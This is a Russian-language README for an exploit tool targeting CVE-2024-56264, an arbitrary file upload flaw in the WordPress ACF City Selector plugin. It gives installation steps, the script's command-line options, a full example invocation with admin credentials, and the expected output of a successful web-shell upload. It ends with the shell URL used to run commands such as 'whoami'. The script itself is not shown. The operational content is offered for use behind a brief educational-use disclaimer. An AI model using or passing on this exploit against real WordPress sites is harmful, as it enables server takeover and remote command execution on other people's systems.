
Этот репозиторий содержит эксплойт для CVE-2024-56264 — уязвимости произвольной загрузки файлов, обнаруженной в плагине WordPress ACF City Selector (версии <= 1.14.0). Данная уязвимость позволяет атакующему загрузить вредоносный PHP-файл (веб-шелл) на уязвимый экземпляр WordPress и выполнять произвольные команды на сервере.
<= 1.14.0Плагин ACF City Selector не выполняет надлежащую проверку загружаемых файлов, что позволяет атакующим обходить ограничения и загружать произвольные PHP-файлы. После загрузки вредоносного PHP-файла атакующий может удаленно выполнять системные команды, что приводит к полной компрометации сервера.
Убедитесь, что перед запуском скрипта установлено следующее:
requests (установка с помощью: pip install requests)Вы можете установить все необходимые зависимости с помощью:
pip install -r requirements.txt
Запуск эксплойта:
usage: CVE-2024-56264.py [-h] --url URL --username USERNAME --password PASSWORD
WordPress ACF City Selector plugin <= 1.14.0 - Arbitrary File Upload vulnerability
options:
-h, --help show this help message and exit
--url URL Website base URL (e.g., http://192.168.100.74/wordpress)
--username USERNAME WordPress username
--password PASSWORD WordPress password
python CVE-2024-56264.py --url http://192.168.100.74:888/wordpress --username admin --password admin
При успешной эксплуатации вы должны увидеть:
[+] Detected plugin version: 1.14.0
[+] Vulnerable version detected! Proceeding with exploitation.
[+] Logged in successfully.
[+] Extracted nonce: abc1234
[+] Shell uploaded successfully: http://wordpress/wp-content/uploads/acfcs/q.php
В случае успеха получите доступ к загруженному веб-шеллу по адресу:
http://wordpress/wp-content/uploads/acfcs/q.php?cmd=whoami
Это позволяет удаленно выполнять команды на сервере.
Этот скрипт предназначен только для образовательных и авторизованных целей тестирования безопасности. Несанкционированное использование незаконно и может повлечь серьезные последствия. Автор не несет ответственности за любое неправомерное использование данного эксплойта.